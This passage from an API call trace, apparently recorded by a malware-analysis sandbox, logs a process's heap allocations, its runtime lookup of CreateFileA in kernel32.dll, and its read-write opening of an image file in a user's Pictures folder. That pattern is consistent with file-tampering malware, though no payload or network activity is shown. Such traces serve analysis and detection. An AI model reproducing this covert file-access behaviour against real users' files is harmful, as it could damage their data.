Size=0x10) returned 0x889b08 [0040.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0040.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0040.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.416] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.419] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0040.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cc88 [0040.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cc88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0040.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.419] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0040.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc88 [0040.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cc88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0040.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.419] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0040.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0040.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0040.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png", cchWideChar=68, lpMultiByteStr=0x88e138, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png", lpUsedDefaultChar=0x0) returned 68 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.421] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\vyeric.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x88) returned 0x7bbc00 [0040.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=68, lpWideCharStr=0x7bbc00, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png") returned 68 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.423] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 